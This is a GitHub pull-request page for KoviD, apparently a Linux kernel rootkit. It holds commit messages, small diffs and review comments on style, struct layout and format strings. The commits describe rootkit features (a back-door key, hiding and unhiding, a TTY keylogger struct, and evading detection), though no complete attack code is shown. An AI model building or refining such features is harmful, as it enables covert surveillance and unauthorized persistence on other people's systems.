Kvdev #177

Merged
merged 18 commits into from
Jan 6, 2025

carloslack
Owner

No description provided.

JNE and others added 15 commits January 3, 2025 10:00
Just like back-door key, encrypt unhide as well.
Also applied drive-by fixes
Also: 	crypto: re-work API names init
	Re-organize error exit
Move it from source code to
Makefile and highlight important
build information.
Also API now expects struct file and list_head
Note: multiple contexts untested, unsupported for now.
and remove useless copy modification
This is not a fix, need to work out how
it the test will understand the difference
broken by this commit (debug only):
        get-bdkey
        get-unhidekey

Both commands need now to fetch the keys from mgc
Debug mode only.

decrypt and present to user via proc UI.
carloslack requested a review from djolertrk January 4, 2025 12:02
@@ -32,7 +32,7 @@ COMPILER_OPTIONS := -Wall -Wno-vla -DPROCNAME='"$(PROCNAME)"' \
EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS}

SRC := src/${OBJNAME}.c src/pid.c src/fs.c src/sys.c \
src/sock.c src/util.c src/vm.c src/crypto.c
src/sock.c src/util.c src/vm.c src/crypto.c src/tty.c
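Review bot: SRC packs several sources onto each continuation line, so adding src/tty.c rewrites the whole last line instead of adding one. Listing one source per line would make additions like this a one-line diff and easier to keep in step with any other build file that carries the same list.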
Collaborator

Can you please add this into https://github.com/carloslack/KoviD/blob/master/CMakeLists.txt#L109 as well? It is not being used by default (yet), but at least let it compile, so just add that source into the list.

#ifndef __AUTO_H
#define __AUTO_H

static uint64_t __attribute__((unused)) auto_bdkey = 0x0000000000000000;
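Review bot: auto_bdkey is defined static in a header, so every .c file that includes auto.h gets its own private copy, which is why the unused attribute is needed. If the value is never written at run time, static const would say so; if a single shared object is intended, declare it extern here and define it in one .c file. The guard name __AUTO_H also starts with a double underscore, a prefix reserved for the implementation.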
Collaborator

Nice

Comment on lines -44 to -47
#ifdef DEBUG_RING_BUFFER
#pragma message "!!! Be careful: Build kovid in DEBUG mode !!!"
#endif

Collaborator

Why do you think this message is not useful anymore?

@@ -476,19 +472,51 @@ static const match_table_t tokens = {
{ Opt_unhide_directory, "unhide-directory=%s" },

{ Opt_journalclt, "journal-flush" },
{ Opt_fetch_base_address, "base-address=%d" },
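Review bot: Opt_journalclt in the tokens table reads like a transposition of journalctl, and it sits next to the string "journal-flush". Naming the enum after the command string (for example Opt_journal_flush) would make the table easier to search and match against the option names.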
Collaborator

Thanks :D

src/kovid.c Outdated
Comment on lines 483 to 487
struct userdata_t {
bool ok;
int op;
uint64_t address_value;
};
Collaborator

struct userdata_t {
	uint64_t address_value;
	int op;
	bool ok;
};

better layout for the struct, right?

snprintf(bits, 32, "%lx", auto_bdkey);
set_elfbits(bits);
} break;
case Opt_get_bdkey:
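Review bot: the "%lx" format in the snprintf call does not match auto_bdkey, which auto.h declares as uint64_t; in kernel builds that type is unsigned long long, so the conversion should be "%llx". The literal 32 would also be better as sizeof(bits) if bits is an array, so the bound follows the buffer declaration.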
Collaborator

cool, looks good

src/kovid.c Outdated
Comment on lines 487 to 490
struct check_unhidekey_t {
bool ok;
uint64_t address_value;
};
Collaborator

struct check_unhidekey_t {
    uint64_t address_value;
    bool ok;
};
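
An added example, not part of the PR or the project's code: a userspace check of the two field orderings discussed in the review comments on `userdata_t` and `check_unhidekey_t`, measuring total size, padding between fields and padding at the end with `offsetof`. The `_orig`/`_sugg` struct names and the `measure`, `F`, `LAYOUT_FN` and `SHOW` helpers are assumptions made for this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Field orders as first submitted (_orig) and as suggested in review (_sugg).
 * The suffixed names are assumptions for this example, not project names. */
struct userdata_orig  { bool ok; int op; uint64_t address_value; };
struct userdata_sugg  { uint64_t address_value; int op; bool ok; };
struct unhidekey_orig { bool ok; uint64_t address_value; };
struct unhidekey_sugg { uint64_t address_value; bool ok; };

struct field  { size_t off, len; };
struct layout { size_t size, interior_pad, tail_pad; };

/* Walk fields in declaration order, summing the gaps the compiler inserted. */
static struct layout measure(size_t size, const struct field *f, size_t n)
{
    struct layout l = { size, 0, 0 };
    size_t end = 0;
    for (size_t i = 0; i < n; i++) {
        l.interior_pad += f[i].off - end;
        end = f[i].off + f[i].len;
    }
    l.tail_pad = size - end;
    return l;
}

#define F(t, m) { offsetof(struct t, m), sizeof(((struct t *)0)->m) }
#define LAYOUT_FN(t, ...) struct layout t##_layout(void) { \
    const struct field f[] = { __VA_ARGS__ }; \
    return measure(sizeof(struct t), f, sizeof f / sizeof f[0]); }

LAYOUT_FN(userdata_orig, F(userdata_orig, ok), F(userdata_orig, op),
          F(userdata_orig, address_value))
LAYOUT_FN(userdata_sugg, F(userdata_sugg, address_value), F(userdata_sugg, op),
          F(userdata_sugg, ok))
LAYOUT_FN(unhidekey_orig, F(unhidekey_orig, ok), F(unhidekey_orig, address_value))
LAYOUT_FN(unhidekey_sugg, F(unhidekey_sugg, address_value), F(unhidekey_sugg, ok))

#define SHOW(t) do { struct layout l = t##_layout(); \
    printf("%-15s size=%zu interior=%zu tail=%zu\n", #t, l.size, l.interior_pad, l.tail_pad); } while (0)

int main(void)
{
    SHOW(userdata_orig); SHOW(userdata_sugg);
    SHOW(unhidekey_orig); SHOW(unhidekey_sugg);
    return 0;
}
```

On an LP64 target such as x86_64 Linux all four structs come out at 16 bytes: the suggested order removes the padding between fields and leaves it at the end.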

src/tty.c Outdated
Comment on lines 14 to 19
struct keylog_t {
char buf[KEY_LOG_BUF_MAX+2]; /** newline+'\0' */
int offset;
uid_t uid;
struct list_head list;
};
Collaborator

the layout can be better

JNE added 2 commits January 6, 2025 09:59
It is a weakness having them
Suppose you want to find the rootkit?

$ >kv
$ ls kv
carloslack merged commit e1020fa into master Jan 6, 2025
2 checks passed